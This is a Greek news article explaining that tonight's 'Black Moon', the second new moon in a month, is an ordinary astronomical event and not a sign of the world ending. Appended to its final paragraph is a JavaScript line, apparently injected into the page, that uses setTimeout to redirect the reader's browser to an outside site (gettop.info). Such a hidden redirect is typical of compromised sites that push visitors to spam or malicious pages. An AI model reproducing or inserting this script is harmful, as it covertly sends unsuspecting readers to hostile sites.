Έρχεται το τέλος του κόσμου; – Απόψε το… Μαύρο Φεγγάρι

0
22

 

Ένα πλανητικό φαινόμενο που πολλοί το συνδέουν με την Αποκάλυψη κάνοντας λόγο για συντέλεια του κόσμου θα συμβεί απόψε.

Το φαινόμενο του Μαύρου Φεγγαριού θα είναι σε εξέλιξη απόψε αν και από την Ελλάδα δεν θα γίνει ορατό. Πολλές προφητείες έχουν αναφερθεί στο φαινόμενο αυτό που φθάνουν στο σημείο να διατυμπανίζουν ότι θα έρθει και το τέλος του κόσμου.

Ωστόσο, οι επιστήμονες είναι άκρως καθησυχαστικοί καθώς απορρίπτουν τους θεολογικούς ισχυρισμούς για να ερμηνεύσουν αστροφυσικά το φαινόμενο.

Όπως υποστηρίζουν πρόκειται απλώς για τη χάση του φεγγαριού και την εμφάνιση του νέου φεγγαριού. Συγκεκριμένα «Μαύρο Φεγγάρι» ονομάζεται το δεύτερο νέο φεγγάρι μέσα σε ένα μήνα, ένα φαινόμενο που εμφανίζεται περίπου κάθε 32 μήνες.

Έχει να κάνει με την κίνηση της Γης και του δορυφόρου της, δηλαδή της Σελήνης, την οποίας η φωτεινή πλευρά θα είναι από την άλλη πλευρά, και έτσι αυτό που θα δούμε εμείς από τη Γη θα είναι μία σκιά.

Συγκεκριμένα, η σελήνη βρίσκεται ανάμεσα στη Γη καιτον Ήλιο και έτσι η φωτεινή πλευρά του Φεγγαριού «κοιτάει» προς τα έξω.

Όπως αναφέρει το AccuWeather, την τελευταία φορά που παρουσιάστηκε το συγκεκριμένο φαινόμενο του δεύτερου νέου φεγγαριού μέσα σε έναν μήνα συνέβη τον Μάρτιο του 2014.

Οπότε όσοι θεωρούν ότι δεν θα ξηερώσει Σάββατο, ας το σκεφτούν καλύτερα κι εσπιστημονικά αφήνοντας κατά μέρους τις συνωμοσιολογίες και τις προκαταλήψεις. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here